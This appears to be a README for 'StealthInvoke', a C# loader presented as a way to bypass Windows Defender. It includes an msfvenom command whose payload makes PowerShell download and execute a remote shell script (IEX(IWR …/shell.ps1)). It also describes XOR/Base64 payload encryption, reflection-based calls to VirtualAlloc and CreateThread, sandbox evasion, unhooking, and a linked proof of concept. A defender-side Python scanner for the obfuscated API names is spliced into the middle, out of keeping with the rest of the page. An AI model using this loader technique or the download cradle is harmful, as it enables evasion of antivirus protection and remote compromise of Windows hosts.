# StealthInvoke

StealthInvoke.exe is a C# application capable of bypassing Windows Defender. It dynamically invokes the VirtualAlloc and CreateThread functions through System.Reflection and decrypts the malicious payload in memory, so the payload never exists in clear form on disk and disk-based detection is bypassed.

### Features

* Remote Interactive shell
* Dynamically Invoke functions like VirtualAlloc and CreateThread
* Basic Sandbox Evasion

### How the script works

1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows:

```bash
msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp
```

2. Payload Encryption: Next, we encrypt the generated payload using XOR and Base64 encoding. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code.
3. Function Name Encryption: We apply the same XOR and Base64 approach to the strings "VirtualAlloc" and "CreateThread" to obscure their use in the code.
4. Dynamic Invocation and Decryption: Finally, using System.Reflection, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory.
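The obfuscation described in steps 2 and 3 (XOR, then Base64) is exactly what a defender can look for when triaging a .NET sample: Base64 tokens that, after a single-byte XOR, spell out API names such as VirtualAlloc or CreateThread. The following scanner is an added example written from the analyst's side; it is not StealthInvoke's own code. It assumes a single-byte XOR key (the page does not state the key length) and runs against a constructed snippet of obfuscated source rather than a real binary.

```python
import base64
import re

# API names whose obfuscated presence is a strong loader indicator.
API_NAMES = ["VirtualAlloc", "CreateThread", "VirtualProtect", "WriteProcessMemory"]

# Candidate Base64 tokens: at least 12 Base64 characters with optional padding.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (assumption: single-byte key)."""
    return bytes(b ^ key for b in data)


def find_obfuscated_api_names(blob: bytes):
    """Return (token, key, api_name) for every Base64 token that decodes,
    under some single-byte XOR key, to text containing a known API name.
    key == 0 also catches names that are only Base64-encoded."""
    hits = []
    for match in B64_RE.finditer(blob):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except Exception:
            continue  # not valid Base64 (wrong length or padding)
        for key in range(256):
            decoded = xor_bytes(raw, key)
            for name in API_NAMES:
                if name.encode() in decoded:
                    hits.append((token.decode(), key, name))
    return hits


def build_sample(key: int = 0x2A) -> bytes:
    """Constructed input: two API names obfuscated the way the page describes,
    embedded in a fake C# string table next to a harmless Base64 string."""
    parts = [
        base64.b64encode(xor_bytes(n.encode(), key)).decode()
        for n in ("VirtualAlloc", "CreateThread")
    ]
    return (
        f'string a = "{parts[0]}"; string b = "{parts[1]}"; '
        f'string c = "SGVsbG8gV29ybGQh";'  # "Hello World!" - must not match
    ).encode()


if __name__ == "__main__":
    for token, key, name in find_obfuscated_api_names(build_sample()):
        print(f"{token} -> XOR key 0x{key:02x} -> {name}")
```

The scanner deliberately tries all 256 keys rather than guessing, so it costs 256 decodes per token; for a whole binary, run it over the strings extracted from the .NET user-string heap rather than the raw file to keep candidate counts small. A multi-byte XOR key would defeat this exact check, which is why it is best paired with behavioural telemetry (reflection-based resolution of VirtualAlloc/CreateThread, RWX allocations followed by thread creation) rather than used alone.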

### Note

Advanced antivirus programs may have hooked functions such as VirtualAlloc and CreateThread. To execute the payload in that case, it first needs to be unhooked, and only then is the payload loaded into memory.

### POC

{% file src="/files/CCYJXou5eTwt4vTKgdDm" %}
